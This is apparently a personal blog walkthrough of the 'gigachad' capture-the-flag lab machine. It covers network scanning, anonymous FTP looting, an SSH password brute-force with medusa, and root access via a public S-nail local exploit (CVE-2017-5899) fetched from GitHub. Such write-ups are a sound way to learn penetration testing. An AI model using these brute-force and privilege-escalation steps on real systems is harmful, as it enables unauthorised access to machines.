Taking down gigachad

Overview:

Target Machine IP Address: 192.168.56.110  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Easy

linpeas.sh did wonder as always

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.110

nmap -sC -sV -p- -Pn 192.168.56.110 -o nmap.log
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/kingchad.html

  1. FTP

file chadinfo   (it is an archived or zipped file)
unzip chadinfo 

strings chadinfo

I found there is a username=chad  and a file at  /drippinchad.png

  2. SSH

Then I tried to brute-force the ssh (because we know that the system is running ssh service from the nmap result) using hydra and medusa (it is becoming my favorite brute-force tool)

However, I tried every method I am aware of but couldn’t figure out. So I had to sneak other people’s walkthrough and I came to know that the hint was related with  /drippinchad.png . I too upload the image in google image search engine and I came to know that the tower is called Maiden’s Tower. So, I made a list of these passwords (save it as password.txt).

– Maiden’sTower
– MaidensTower
– Maiden
– MaidenTower

medusa -h 192.168.56.110 -u chad -P password.txt -M ssh

P.S. I have added the above words in the rockyou.txt

ssh chat@192.168.56.110
password: maidenstower

Post Exploitation:

Let’s use my favourite tool linpeas.sh

searchsploit S-nail

cp /usr/share/exploitdb/exploits/multiple/local/47172.sh .

However, this one worked for me. https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh   (I downloaded this on my Kali Machine and then uploaded to /tmp of victim machine)

chmod +x exploit.sh 
./exploit    (I had to run it couple of times to get the root)

cat /root/root.txt

3. HTTP

I found robots.txt and couple more information like hash files in source code etc. But it was just a rabit hole to me so I didn’t write it here provided you were wondering the writer was on luck 😉

Note: This machine took me quite sometime to research and had to peek other write-up as well, specially google image scanning is my first time to try that. However, over all, I had a nice good time taking down this machine.

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu